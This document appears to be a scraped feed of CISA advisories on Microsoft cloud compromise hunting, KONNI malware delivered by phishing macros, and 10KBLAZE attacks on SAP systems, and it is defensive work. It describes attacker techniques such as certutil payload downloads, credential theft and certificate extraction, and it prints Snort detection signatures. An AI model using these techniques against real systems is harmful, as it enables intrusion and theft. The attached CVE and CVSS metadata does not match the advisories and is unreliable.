Log. Auditing narratives on some events no longer exist as part of core Microsoft documentation sources.\n\nThe use of industry-standard SIEMs for log detection is crucial for providing historical context for threat hunting in Microsoft cloud environments. Standard G3/E3 licenses only provide 90 days of auditing; with the advanced auditing license that is provided with a G5/E5 license, audit logs can be extended to retain information for a year. CISA notes that this license change is proactive, rather than reactive: it allows enhanced visibility and features for telemetry from the moment of integration but does not provide retroactive visibility on previous events or historical context.\n\nA properly configured SIEM can provide:\n\nBuilt-in tools, such as Microsoft Cloud Services and M365 applications, provide much of the same visibility available from custom tools and are mapped to the MITRE ATT&amp;CK framework and easy-to-understand dashboards.[[14]](<https://splunkbase.splunk.com/app/3786/>) However, these tools often do not have the ability to pull historical data older than seven days. Therefore, storage solutions that appropriately meet governance standards and usability metrics for analysts for the SIEM must be carefully planned and arranged.\n\n 1. Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk. \n 1. Sparrow output will have the following default filenames, which should not be modified: `AppUpdate_Operations_Export.csv`,`AppRoleAssignment_Operations_Export.csv`, `Consent_Operations_Export.csv`, `Domain_List.csv`, `Domain_Operations_Export.csv`, `FileItems_Operations_Export.csv`, `MailItems_Operations_Export.csv`, `PSLogin_Operations_Export.csv`, `PSMailbox_Operations_Export.csv`, `SAMLToken_Operations_Export.csv`, `ServicePrincipal_Operations_Export.csv`\n 2. Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard.\n 3. Use the data selection filters to point to the indexed Sparrow data (see figure 1)\n 4. 1. Investigate high-value administrative accounts to detect anomalous or unusual activity (Global Admins).\n 2. Enable PowerShell logging, and evaluate PowerShell activity in the environment not used for traditional or expected purposes. \n\n 1. PowerShell logging does not reveal the exact `cmdlet` that was run on the tenant.\n 3. Look for users with unusual sign-in locations, dates, and times.\n 4. Check permissions of service principals and applications in M365/Azure AD.\n 5. Detect the frequency of resource access from unusual places. Use the tool to pivot to a trusted application and see if it is accessing mail or file items.\n 6. Review mailbox rules and recent mailbox rule changes.\n * Sparrow differs from CRT by looking for specific indicators of compromise associated with the recent attacks.\n * CRT focuses on the tenant\u2019s Azure AD permissions and Exchange Online configuration settings instead of the unified audit log, which gives it a different output from Sparrow or Hawk.\n * CRT returns the same broad scope of application/delegated permissions for service principals and applications as Hawk.\n * As part of its investigation, Sparrow homes in on a narrow set of application permissions given to the Graph API, which is common to the recent attacks.\n * CRT looks at Exchange Online federation configuration and federation trust, while Sparrow focuses on listing Azure AD domains.\n * Among the items network defenders can use CRT to review are delegated permissions and application permissions, federation configurations, federation trusts, mail forwarding rules, service principals, and objects with KeyCredentials.\n 1. The IP address and Activity_ID in EventCode 410 and the Activity_ID and Instance_ID in EventCode 500.\n 2. Export-PfxCertificate or certutil-exportPFX in Event IDs 4103 and 4104, which may include detection of a certificate extraction technique.\n 3. Deleted certificate extraction with ADFSdump performed using Sysmon Event ID 18 with the pipe name \\microsoft##wid\\tsql\\query (exclude processes regularly making this pipe connection on the machine).\n 4. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same instance ID for change details (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event).\n 5. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details. (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event.) \n 1. Review events, particularly searching for Configuration: Type: IssuanceAuthority where Property Value references an unfamiliar domain.\n 6. Possible activity of an interrogating ADFS host by using ADFS PowerShell plugins. Look for changes in the federation trust environment that would indicate new ADFS sources.\n 7. Audit the creation and use of service principal and application credentials. Sparrow will detect modifications to these credentials. \n\n 1. Look for unusual application usage, such as dormant or forgotten applications being used again.\n 2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application.\n 8. Look for unexpected trust relationships that have been added to Azure AD. (Download the last 30 days of non-interactive sign-ins from the Azure portal or use Azure Sentinel.).[[10]](<https://docs.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadserviceprincipalsigninlogs >)\n 9. Use Hawk (and any sub-modules available) to run an investigation on a specific user. Hawk will provide IP addresses, sign-in data, and other data. Hawk can also track IP usage in concurrent login situations.\n 10. Review login details for administrator accounts (e.g., high-value administrative accounts, such as Global Admins). Look for unusual sign-in locations, dates, and times.\n 11. Review new token validation time periods with high values and investigate whether the changes are legitimate or a threat actor\u2019s attempts to gain persistence.\n 12. Examine highly privileged accounts; specifically using sign-in logs, look for unusual sign-in locations, dates, and times.\n 13. Create a timeline for all credential changes.\n 14. Monitor changes in application credentials (the script will export into csv named AppUpdate_Operations_Export).\n 15. Detect service principal credentials change and service principal change (e.g., if an actor adds new permissions or expands existing permissions). \n\n 1. Export and view this activity via the ServicePrincipal_Operations_Export.\n 16. Record `OAuth` consent and consent to applications \n\n 1. Export and view this record via the Consent_Operations_Export file.\n 17. Investigate instances of excessive high permissions, including, but not limited to Exchange Online, Microsoft Graph, and Azure AD Graph. \n\n 1. Review Microsoft Graph API permissions granted to service principals.\n 2. Export and view this activity via the ApplicationGraphPermissions csv file. \n\n 1. **Note:** Hawk can also return the full list of service principal permissions for further investigation.\n 3. Review top actors and the amount of credential modifications performed.\n 4. Monitor changes in application credentials.\n 18. Identify manipulation of custom or third-party applications. \n\n 1. Network defenders should review the catalog of custom or third-party vendors with applications in the Microsoft tenant and perform the above interrogation principles on those applications and trusts.\n 19. Review modifications to federation trust settings. \n\n 1. Review new token validation time periods with high values and investigate whether this was a legitimate change or an attempt to gain persistence by the threat actor. \n 1. The script detects the escalation of privileges, including the addition of Service Principals (SP) to privileged roles. Export this data into csv called AppRoleAssignment_Operations_Export.\n 20. In MailItemsAccessed operations, found within the Unified Audit Log (UAL), review the application ID used (requires G5 or E5 license for this specific detail).\n 21. Query the specific application ID, using the Sparrow script\u2019s app ID investigation capability to interrogate mail and file items accessed for that applicationID (Use the application ID utility for any other suspicious apps that require additional analysis.).\n 22. Check the permissions of an application in M365/Azure AD using Sparrow. \n\n 1. Hawk will return Azure_Application_Audit, and Sparrow will return ApplicationGraphPermissions.\n 2. Network defenders will see the IP address that Graph API uses.\n 3. Note: the Microsoft IP address may not show up as a virtual private server/anonymized endpoint.\n 23. Investigate a specific service principal, if it is a user-specific user account, in Hawk. This activity is challenging to see without Azure Sentinel or manually downloading and reviewing logs from the sign-in portal.\n 24. Longer term storage of log data.\n 25. Cross correlation of log data with endpoint data and network data (such as those produced by ADFS servers), endpoint detection and response data, and identity provider information.\n 26. Ability to query use of application connectors in Azure.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [central@cisa.dhs.gov ](<mailto:central@cisa.dhs.gov>)(UNCLASS)\n * us-cert@dhs.sgov.gov (SIPRNET)\n * us-cert@dhs.ic.gov (JWICS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at <http://www.us-cert.cisa.gov/>.\n\n### Resources\n\nAzure Active Directory Workbook to Assess Solorigate Risk: <https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718>\n\nVolexity - Dark Halo Leverages SolarWinds Compromise to Breach Organizations: <https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/>\n\nHow to Find Activity with Sentinel:[ https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/](<https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/>)\n\nThird-Party Walkthrough of the Attack: <https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/>\n\nNational Security Agency Advisory on Detecting Abuse of Authentication Mechanisms: <https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF>\n\nMicrosoft 365 App for Splunk: <https://splunkbase.splunk.com/app/3786/>\n\nCISA Remediation Guidance: <https://us-cert.cisa.gov/ncas/alerts/aa20-352a>\n\n### References\n\n[[1] ZDNet: A Second Hacking Group has Targeted SolarWinds Systems ](<https://www.zdnet.com/article/a-second-hacking-group-has-targeted-solarwinds-systems/>)\n\n[[2] CISA: Supply Chain Compromise ](<https://www.cisa.gov/supply-chain-compromise>)\n\n[[3] Microsoft SolarWinds Post-Compromise Hunting with Azure Sentinel ](<https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095>)\n\n[[4] Microsoft Solorigate Resource Center ](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/>)\n\n[[5] Advanced Audit in Microsoft 365 ](<https://docs.microsoft.com/en-us/microsoft-365/compliance/advanced-audit?view=o365-worldwide>)\n\n[[6] Microsoft: Understanding \u201cSolorigate\u2019s\u201d Identity IOCs ](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610>)\n\n[[7] Detection and Hunting of Golden SAML Attack: ](<https://www.sygnia.co/golden-saml-advisory>)\n\n[[8] Ibid](<https://www.sygnia.co/golden-saml-advisory>)\n\n[[9] Ibid](<https://www.sygnia.co/golden-saml-advisory>)\n\n[[10] Microsoft: AADServicePrincipalSignInLogs](<https://docs.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadserviceprincipalsigninlogs>)\n\n[[11] Microsoft: Understanding \u201cSolorigate\u2019s\u201d Identity IOCs ](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610>)\n\n[[12] Azure Active Directory Sign-in Activity Reports](<https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-all-sign-ins>)\n\n[[13] CrowdStrike: CrowdStrike Launches Free Tool to Identify and Help Mitigate Risks in Azure Active Directory ](<https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/>)\n\n[[14] Microsoft 365 App for Splunk ](<https://splunkbase.splunk.com/app/3786/>)\n\n### Revisions\n\nInitial version: January 8, 2021|February 4, 2021: Removed link and section for outdated product feedback form|April 8, 2021: Added Aviary Dashboard information|April 15, 2021: Added Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-04-15T12:00:00", "id": "AA21-008A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-008a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:05:10", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.\n\n### Technical Details\n\nKONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code (_Phishing: Spearphising Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]). The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)]).\n\nOnce the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies `certutil.exe` into a temp directory and renames it to evade detection.\n\nThe cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.\n\n### MITRE ATT&amp;CK Techniques\n\nAccording to MITRE, [KONNI](<https://attack.mitre.org/versions/v7/software/S0356/>) uses the ATT&amp;CK techniques listed in table 1.\n\n_Table 1: KONNI ATT&amp;CK techniques_\n\n**Technique** | **Use** \n---|--- \n \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n\n| \n\nKONNI can collect the Internet Protocol address from the victim\u2019s machine. \n \n_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n\n| \n\nKONNI can collect the username from the victim\u2019s machine. \n \n_Masquerading: Match Legitimate Name or Location _[[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005>)]\n\n| \n\nKONNI creates a shortcut called `Anti virus service.lnk `in an apparent attempt to masquerade as a legitimate file. \n \n_Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol _[[T1048.003](<https://attack.mitre.org/versions/v7/techniques/T1048/003>)]\n\n| \n\nKONNI has used File Transfer Protocol to exfiltrate reconnaissance data out. \n \n_Input Capture: Keylogging _[[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n\n| \n\nKONNI has the capability to perform keylogging. \n \n_Process Discovery _[[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057>)]\n\n| \n\nKONNI has used `tasklist.exe` to get a snapshot of the current processes\u2019 state of the target machine. \n \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001>)]\n\n| \n\nKONNI used PowerShell to download and execute a specific 64-bit version of the malware. \n \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003>)]\n\n| \n\nKONNI has used `cmd.exe` to execute arbitrary commands on the infected host across different stages of the infection change. \n \n_Indicator Removal on Host: File Deletion_ [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004>)]\n\n| \n\nKONNI can delete files. \n \n_Application Layer Protocol: Web Protocols _[[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n\n| \n\nKONNI has used Hypertext Transfer Protocol for command and control. \n \n_System Information Discovery _[[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n\n| \n\nKONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine and has used `systeminfo.exe` to get a snapshot of the current system state of the target machine. \n \n_File and Directory Discovery_ [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083>)]\n\n| \n\nA version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. \n \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v7/techniques/T1105>)]\n\n| \n\nKONNI can download files and execute them on the victim\u2019s machine. \n \n_Modify Registry _[[T1112](<https://attack.mitre.org/versions/v7/techniques/T1112>)]\n\n| \n\nKONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence. \n \n_Screen Capture _[[T1113](<https://attack.mitre.org/versions/v7/techniques/T1113>)]\n\n| \n\nKONNI can take screenshots of the victim\u2019s machine. \n \n_Clipboard Data _[[T1115](<https://attack.mitre.org/versions/v7/techniques/T1115>)]\n\n| \n\nKONNI had a feature to steal data from the clipboard. \n \n_Data Encoding: Standard Encoding _[[T1132.001](<https://attack.mitre.org/versions/v7/techniques/T1132/001>)]\n\n| \n\nKONNI has used a custom base64 key to encode stolen data before exfiltration. \n \n_Access Token Manipulation: Create Process with Token_ [[T1134.002](<https://attack.mitre.org/versions/v7/techniques/T1134/002>)]\n\n| \n\nKONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user. \n \n_Deobfuscate/Decode Files or Information_ [[T1140](<https://attack.mitre.org/versions/v7/techniques/T1140>)]\n\n| \n\nKONNI has used CertUtil to download and decode base64 encoded strings. \n \n_Signed Binary Proxy Execution: Rundll32_ [[T1218.011](<https://attack.mitre.org/versions/v7/techniques/T1218/011>)]\n\n| \n\nKONNI has used Rundll32 to execute its loader for privilege escalation purposes. \n \n_Event Triggered Execution: Component Object Model Hijacking _[[T1546.015](<https://attack.mitre.org/versions/v7/techniques/T1546/015>)]\n\n| \n\nKONNI has modified ComSysApp service to load the malicious DLL payload. \n \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001>)]\n\n| \n\nA version of KONNI drops a Windows shortcut into the Startup folder to establish persistence. \n \n_Boot or Logon Autostart Execution: Shortcut Modification_ [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n\n| \n\nA version of KONNI drops a Windows shortcut on the victim\u2019s machine to establish persistence. \n \n_Abuse Elevation Control Mechanism: Bypass User Access Control _[[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n\n| \n\nKONNI bypassed User Account Control with the \"AlwaysNotify\" settings. \n \n_Credentials from Password Stores: Credentials from Web Browsers _[[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n\n| \n\nKONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signatures for use in detecting KONNI malware exploits.\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI contains '/weget/*.php' (KONNI)\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; depth:7; offset:0; fast_pattern; content:\".php\"; http_uri; distance:0; within:12; content:!\"Referrer|3a 20|\"; http_header; classtype:http-uri; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|HTTP|0d 0a|\"; http_header; fast_pattern:only; content:\"POST\"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; fast_pattern:only; pcre:\"/^\\/weget\\x2f(?:upload|uploadtm|download)\\.php/iU\"; content:\"POST\"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)`\n\n### Mitigations\n\nCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://us-cert.cisa.gov/ncas/tips/ST18-271>).\n * Keep operating system patches up to date. See [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, \"[Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\"\n\n### Resources\n\n * [d-hunter \u2013 A Look Into KONNI 2019 Campaign](<https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b%20>)\n * [MITRE ATT&amp;CK \u2013 KONNI ](<https://attack.mitre.org/versions/v7/software/S0356/>)\n * [MITRE ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>)\n\n### Revisions\n\nAugust 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Phishing Emails Used to Deploy KONNI Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-10-24T12:00:00", "id": "AA20-227A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-227a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:47:08", "description": "#### Actions to take today to mitigate malicious cyber activity:\n\n 1. Secure and closely monitor Remote Desktop Protocol (RDP).\n 2. Maintain offline backups of data.\n 3. Enable and enforce phishing-resistant multifactor authentication (MFA).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-09-20T12:00:00", "type": "ics", "title": "#StopRansomware: Snatch Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2023-09-20T12:00:00", "id": "AA23-263A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T11:17:58", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [[1](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)]\n\n### Technical Details\n\nA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed \u201c10KBLAZE.\u201d The presentation details the new exploit tools and reports on systems exposed to the internet.\n\n#### SAP Gateway ACL\n\nThe SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[[2](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.\n\n#### SAP Router secinfo\n\nThe SAP router is a program that helps connect SAP systems with external networks. The default `secinfo` configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker\u2019s requests, which may result in remote code execution.\n\nAccording to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.\n\n#### SAP Message Server\n\nSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the customer in all releases.\n\n#### Signature\n\nCISA worked with security researchers from Onapsis Inc.[[3](<https://www.onapsis.com/>)] to develop the following Snort signature that can be used to detect the exploits:\n\nalert tcp $EXTERNAL_NET any -&gt; $HOME_NET any (msg:\"10KBLAZE SAP Exploit execute attempt\"; flow:established,to_server; content:\"|06 cb 03|\"; offset:4; depth:3; content:\"SAPXPG_START_XPG\"; nocase; distance:0; fast_pattern; content:\"37D581E3889AF16DA00A000C290099D0001\"; nocase; distance:0; content:\"extprog\"; nocase; distance:0; sid:1; rev:1;)\n\n### Mitigations\n\nCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:\n\n * Ensure a secure configuration of their SAP landscape.\n * Restrict access to SAP Message Server. \n * Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways (`gw/acl_mode `and `secinfo`) and Message Servers (`ms/acl_info`).[[4](<https://launchpad.support.sap.com/#/notes/1408081>)], [[5](<https://launchpad.support.sap.com/#/notes/821875>)]\n * Review SAP Note 1421005. Split MS internal/public:` rdisp/msserv=0 rdisp/msserv_internal=39NN`. [[6](<https://launchpad.support.sap.com/#/notes/1421005>)]\n * Restrict access to Message Server internal port (`tcp/39NN`) to clients or the internet.\n * Enable Secure Network Communications (SNC) for clients.\n * Scan for exposed SAP components. \n * Ensure that SAP components are not exposed to the internet.\n * Remove or secure any exposed SAP components.\n\n### References\n\n[[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials ](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)\n\n[[2] SAP: Gateway Access Control Lists ](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)\n\n[[3] Onapsis Inc. website ](<https://www.onapsis.com>)\n\n[[4] SAP Note 1408081 ](<https://launchpad.support.sap.com/#/notes/1408081>)\n\n[[5] SAP Note 821875 ](<https://launchpad.support.sap.com/#/notes/821875>)\n\n[[6] SAP Note 1421005 ](<https://launchpad.support.sap.com/#/notes/1421005>)\n\n### Revisions\n\nMay 2, 2019: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-05-03T12:00:00", "type": "ics", "title": "New Exploits for Unsecure SAP Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 